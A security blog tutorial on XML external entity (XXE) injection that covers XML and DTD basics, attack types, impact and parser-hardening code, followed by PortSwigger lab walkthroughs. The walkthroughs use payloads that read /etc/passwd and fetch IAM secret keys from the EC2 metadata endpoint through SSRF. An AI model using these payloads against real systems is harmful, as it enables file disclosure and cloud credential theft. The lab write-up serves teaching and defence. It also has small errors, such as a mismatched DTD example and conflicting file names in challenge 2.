Web Security Vulnerabilities - XML external entity (XXE)

9 minute read

What is XML?

Extensible Markup Language, also known as XML, is a markup language similar to HTML, designed to store and transport data. It facilitates data exchange between systems such as websites, databases, and third-party applications. Unlike HTML, which has predefined tags, XML allows you to define your own tags tailored to specific needs.

Why we use XML?

XML supports robust schema validation through XML Schema Definition (XSD) or Document Type Definition (DTD).
XML is better suited for representing deeply nested or complex data structures compared to JSON.
Sharing data across different systems is simplified as XML doesn’t require conversion during transfer.

JSON excels in lightweight, web-based, or mobile applications where simplicity, speed, and ease of use are critical. However, XML’s strengths in schema validation, namespaces, and document handling make it indispensable for specific use cases.

What is XML Entities?

XML Entities represent data within an XML document by using a placeholder instead of the actual data.

Example:

In the example below, we define an entity called name with the value John.

<!DOCTYPE note [
  <!ENTITY name "John">
]>
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>&name;</heading>
  <body>Don't forget me this weekend!</body>
</note>

The entity reference &name; will be replaced by its value (John) by the XML parser.

Entities < and > represent the characters < and >. These are metacharacters used to denote XML tags and must generally be represented using their entities when they appear within data.

What is Document Type Definition (DTD)?

Document Type Definition (DTD) defines the structure and legal elements of an XML document.

Example:

<!DOCTYPE note
[
<!ELEMENT note (job)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>

In this example, DTD is declared using the DOCTYPE keyword.

<!ELEMENT name (job)> defines that name element must contain the elements: job.

<!ELEMENT heading (#PCDATA)> defines that heading element must be of type #PCDATA (parsed character data).

The DTD can be fully self-contained within the document itself (known as an “internal DTD”) or can be loaded from elsewhere (known as an “external DTD”) or can be hybrid of the two.

What are XML external entities?

XML external entities (XXE) are entities defined outside of the XML document and referenced within it. They are a feature that allows the inclusion of content from external sources into an XML document. External entities are declared using the SYSTEM keyword in the <!ENTITY> declaration and typically point to a file or URL.

What is XXE Injection?

XML External Entity (XXE) Injection is a security vulnerability that occurs when an attacker manipulates the XML parser by including malicious external entities. This allows an attacker to view files on the application server or interact with external or internal systems.

Example:

Assume a shopping application uses XML to store and transport data on the product details page.

The XML code:

<?xml version="1.0" encoding="UTF-8"?>
<shop>
  <productId>5</productId>
  <name>T-Shirt</name>
</shop>

An attacker could exploit this XML code to retrieve files from the server by declaring an external entity and referencing it to retrieve the value of an entity.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE shop [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<shop>
  <productId>T-Shirt</productId>
  <name>&xxe;</name>
</shop>

In the above example, the attacker tries to retrieve the /etc/passwd file from the server.

What are types of XXE Injection attacks?

Exploit XXE to retrieve files

When an attacker defines an external entity containing a path to the file, and the application returns the content of the file in the response. It requires you modifying the submitted XML.
Exploit XXE to perform SSRF

Attackers can use XXE to trigger SSRF and force the application to make request to malicious URLs.
Exploit blind XXE to retrieve data via error messages

Blind XXE means that an application doesn’t return data in the response, so an attacker can exploit Blind XXE via triggering parsing errors to generate an error message containing sensitive data.
Exploiting blind XXE exfiltrate data out-of-band

where sensitive data is transmitted from the application server to a system that the attacker controls. It involves the attacker hosting a malicious DTD on a system that they control, and then invoking the external DTD from within the in-band XXE payload.

What is the impact of XXE Injection?

XXE vulnerabilities can be quite dangerous as they can lead to the disclosure of sensitive information and other serious security issues. Exploiting of XXE Injection vulnerability may lead to:

Local File Inclusion (LFI): An attacker can exploit XXE to read sensitive files from the server, such as configuration files, credentials, or other confidential data.
Server Side Request Forgery (SSRF): XXE can be used to trigger the server to make requests to other systems, potentially disclosing sensitive information or performing unauthorized actions.
Remote Code Execution (RCE): Allowing an attacker to execute arbitrary code on the server.
Data Exfiltration: Attackers can use XXE to exfiltrate data from the server by including external entity declarations that send data to an external server controlled by the attacker.

What are types of XXE Injection?

In an in-band XXE attack, the attacker sends the attack and receives a response through the same channel, for example, via a direct HTTP request and response.
In an out-of-band XXE attack, the vulnerable system sends the results of an attack to a different resource controlled by the attacker. For example, the attack may be performed using a direct request but cause the hacked web server to send a sensitive file to the attacker’s own web server.
In a blind XXE attack, the attacker does not receive any direct response or result following an attack. Instead, they observe the behavior of the vulnerable web application (for example, the error messages it generates) to determine whether the attack was successful and use this indirect feedback to exfiltrate information step-by-step.

How to prevent XXE Injection?

Most XXE Injection vulnerabilities arise because the XML parsing libraries supports features that the application doesn’t need or it’s not required, so the most effective way to prevent XXE Injection is to disable these features, including Document Type Definitions (DTDs).

Disable DTD:

Java:

javaCopy codeDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Python:

pythonCopy codefrom lxml import etree
parser = etree.XMLParser(resolve_entities=False)
etree.fromstring(xml_string, parser)

.NET:

csharpCopy codeXmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;

Time to practice

Let’s practice on some labs to have better understanding on XXE vulnerability. So, today challenges will be from Portswigger.

Challenge #1

The goal of the first challenge is to read /etc/passwd file, so let’s start with web page.

Challenge_description

We can see that it’s a shop. If we look around we can find check stock feature, so let’s click it and intercept the request to burp.

Challenge_intro

Challenge_test_1

We can see the request just checks for the stock and the data was sent as an XML which indicates to XXE Injection.

Challenge_burp

So, let’s try to test for XXE and read internal files like /etc/passwd using:

<!DOCTYPE test  [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >] >

The first thing is defining a structure of XML document using DOCTYPE keyword.

Then we need to represent data with XML document using ENTITY keyword with name xxe.

Since our goal is to read a file, we need to use the SYSTEM keyword and pass the file using the file:// protocol.

Finally, we call the &name; entity reference, which will be replaced with its value by the parser.

Challenge_exploit

And we have solved the lab.

Challenge_solve

Challenge #2

In the second challenge, we should read /etc/hosts file to solve the lab. So let’s start.

Challenge_description

Let’s look around the web page and we can see upload feature in the comment section of a post.

Challenge_intro

Challenge_test_1

As we know it’s an XXE lab, so we need to upload XML file.

As svg format uses XML, an attacker can upload a malicious svg image and exploit XXE vulnerability.

So, Let’s try to upload normal svg image and see whether the application accepts it.

Challenge_upload_success

Challenge_upload_success_2

We can see above, svg files are allowed. So, let’s create local svg file with our payload.

The payload will like the previous challenge, but here we will try to read /etc/hostname file.

Challenge_exploit_1

Now let’s back to comments section again and open image in new tab.

Challenge_exploit_2

We have the lab solution, so let’s submit it and solve the lab.

Challenge_exploit_3

Challenge_solve

Challenge #3

We can see in the challenge description that the lab server is running EC2 metadata endpoint which is http://169.254.169.254/. So, to solve this lab is to obtain the server’s IAM secret access key from EC2 metadata endpoint.

Challenge_description

If we check the web page, it looks like the first challenge, so let’s click check stock and intercept the request in Burp Repeater

Challenge_intro

Challenge_test_1

Challenge_burp

We can see above the data was sent is XML, so we will use the same payload used in the first challenge to test if it’s vulnerable to XXE or not.

We can see the application is vulnerable to XXE and we can read files on the system.

Challenge_exploit_1

So, what we need to access is EC2 metadata endpoint and retrieve it’s data. Let’s try to access it.

Challenge_exploit_2

As we can access the EC2 metadata endpoint let’s keep going and follow it’s directories to access the secret key.

/latest/

Challenge_exploit_3

/meta-data/

Challenge_exploit_4

/iam/

Challenge_exploit_5

/secert-credentials/

Challenge_exploit_6

/admin

Challenge_exploit_7

Now we have the SecretAccessKey, let’s submit it and solve the lab.

Challenge_solve

Resources

Conclusion

In this blog, we covered what is XXE, types, impact and prevention. We also discussed about basic knowledge about XML and solve labs to get better understanding.

Hope you enjoy! Thanks for reading.

Abdelrahman Elshinbary

What is XML?

Why we use XML?

What is XML Entities?

What is Document Type Definition (DTD)?

What are XML external entities?

What is XXE Injection?

What are types of XXE Injection attacks?

What is the impact of XXE Injection?

What are types of XXE Injection?

How to prevent XXE Injection?

Time to practice

Challenge #1

Challenge #2

Challenge #3

Resources

Conclusion